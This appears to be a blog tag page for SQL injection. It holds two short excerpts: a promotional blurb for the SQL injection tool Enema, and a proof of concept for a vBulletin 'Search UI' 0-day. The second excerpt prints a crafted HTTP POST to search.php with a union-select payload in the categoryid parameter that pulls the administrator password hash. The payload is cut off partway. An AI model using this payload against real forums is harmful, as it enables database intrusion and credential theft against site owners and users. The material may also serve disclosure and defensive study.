Tagged: SQL injection

Enema – tool for SQL injection

Enema is not auto-hacking software. It is a dynamic tool for people who know what to do. Old database versions (e.g. MySQL 4.x) are not supported; development targets modern versions. Features: Multi-platform. User-friendly graphical...


vBulletin "Search UI" SQL Injection 0-day – part II

vBulletin “Search UI” SQL Injection PoC:

POST /search.php?do=process HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select...